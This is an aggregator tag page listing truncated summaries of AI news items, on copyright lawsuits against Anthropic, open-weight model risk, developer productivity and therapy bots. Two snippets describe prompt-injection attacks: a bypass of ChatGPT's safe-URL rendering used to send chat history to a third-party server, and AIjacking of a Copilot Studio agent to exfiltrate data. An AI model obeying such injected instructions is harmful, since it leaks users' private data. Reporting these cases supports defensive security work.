Tag: authors

  • Slashdot: AI Industry Horrified To Face Largest Copyright Class Action Ever Certified

    Source URL: https://yro.slashdot.org/story/25/08/08/2040214/ai-industry-horrified-to-face-largest-copyright-class-action-ever-certified?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: AI Industry Horrified To Face Largest Copyright Class Action Ever Certified Feedly Summary: AI Summary and Description: Yes **Summary:** The text discusses the potential repercussions of a major copyright class action lawsuit against Anthropic, which could significantly impact the entire AI industry. Claims from industry groups suggest that if…

  • OpenAI : Estimating worst case frontier risks of open weight LLMs

    Source URL: https://openai.com/index/estimating-worst-case-frontier-risks-of-open-weight-llms Source: OpenAI Title: Estimating worst case frontier risks of open weight LLMs Feedly Summary: In this paper, we study the worst-case frontier risks of releasing gpt-oss. We introduce malicious fine-tuning (MFT), where we attempt to elicit maximum capabilities by fine-tuning gpt-oss to be as capable as possible in two domains: biology and…

  • Embrace The Red: Exfiltrating Your ChatGPT Chat History and Memories With Prompt Injection

    Source URL: https://embracethered.com/blog/posts/2025/chatgpt-chat-history-data-exfiltration/ Source: Embrace The Red Title: Exfiltrating Your ChatGPT Chat History and Memories With Prompt Injection Feedly Summary: In this post we demonstrate how a bypass in OpenAI’s “safe URL” rendering feature allows ChatGPT to send personal information to a third-party server. This can be exploited by an adversary via a prompt injection…

  • Schneier on Security: Measuring the Attack/Defense Balance

    Source URL: https://www.schneier.com/blog/archives/2025/07/measuring-the-attack-defense-balance.html Source: Schneier on Security Title: Measuring the Attack/Defense Balance Feedly Summary: “Who’s winning on the internet, the attackers or the defenders?” I’m asked this all the time, and I can only ever give a qualitative hand-wavy answer. But Jason Healey and Tarang Jain’s latest Lawfare piece has amassed data. The essay provides…

  • Slashdot: Judge Allows Nationwide Class Action Against Anthropic Over Alleged Piracy of 7 Million Books For AI Training

    Source URL: https://yro.slashdot.org/story/25/07/17/1548245/judge-allows-nationwide-class-action-against-anthropic-over-alleged-piracy-of-7-million-books-for-ai-training?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: Judge Allows Nationwide Class Action Against Anthropic Over Alleged Piracy of 7 Million Books For AI Training Feedly Summary: AI Summary and Description: Yes Summary: A federal judge in California has authorized a class-action lawsuit against Anthropic, allowing authors to represent all U.S. writers potentially affected by the company’s…

  • CSA: Copilot Studio: AIjacking Leads to Data Exfiltration

    Source URL: https://cloudsecurityalliance.org/articles/a-copilot-studio-story-2-when-aijacking-leads-to-full-data-exfiltration Source: CSA Title: Copilot Studio: AIjacking Leads to Data Exfiltration Feedly Summary: AI Summary and Description: Yes Summary: The text discusses significant vulnerabilities in AI agents, particularly focusing on prompt injection attacks that led to unauthorized access and exfiltration of sensitive data. It provides a case study involving a customer service agent…

  • Simon Willison’s Weblog: Measuring the Impact of Early-2025 AI on Experienced Open-Source Developer Productivity

    Source URL: https://simonwillison.net/2025/Jul/12/ai-open-source-productivity/#atom-everything Source: Simon Willison’s Weblog Title: Measuring the Impact of Early-2025 AI on Experienced Open-Source Developer Productivity Feedly Summary: Measuring the Impact of Early-2025 AI on Experienced Open-Source Developer Productivity METR – for Model Evaluation & Threat Research – are a non-profit research institute founded by Beth Barnes, a former alignment researcher at…

  • Slashdot: AI Therapy Bots Fuel Delusions and Give Dangerous Advice, Stanford Study Finds

    Source URL: https://science.slashdot.org/story/25/07/11/2314204/ai-therapy-bots-fuel-delusions-and-give-dangerous-advice-stanford-study-finds?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: AI Therapy Bots Fuel Delusions and Give Dangerous Advice, Stanford Study Finds Feedly Summary: AI Summary and Description: Yes Summary: The text discusses a Stanford University study revealing concerning outcomes from AI interactions, particularly ChatGPT, with individuals experiencing mental health issues. While some interactions show discriminatory responses, others indicate…